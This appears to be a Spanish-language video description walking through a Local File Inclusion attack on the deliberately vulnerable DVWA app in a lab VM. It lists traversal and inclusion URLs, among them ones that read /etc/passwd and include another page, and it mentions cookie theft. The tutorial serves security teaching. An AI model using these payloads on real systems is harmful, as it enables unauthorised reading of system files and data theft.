Local File Inclusion (LFI) en dvwa - Kali Linux

Опубликовано: 14 Май 2026
на канале: Cyber Akuma
1,142
6

Vamos a identificar la vulnerabilidada LFI
Local File Inclusion

Usamos el sistema OWASP Broken Web Apps

Abrimos un navegador y vamos a
http://192.168.1.109/dvwa/
ponemos credenciales
admin
admin
vamos al apartado File Inclusion

vemos que la URL es
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=include.php

cambiamos el parametro page
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=index.php

Esto nos indica que no existe un archivo index.php
y que puede ser posible que exista la vulnerabilidad LFI

probamos anteponiendo dos puntos y la barra diagonal
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=../../index.php

quiere decir que vamos a subir 2 niveles y deberiamos ver el index de
http://192.168.1.109/dvwa/

Como vemos funciona y la vulnerabilidad esta presente
Vamos a explotarla un poco poniendo
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=http://192.168.1.109/vicnum/index.html

se puede incluir cualquier otra pagina web, podria ser una web maliciosa
para robar cookies o informacion mas valiosa.

probemos
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=../../../../etc/passwd
;)

happy hacking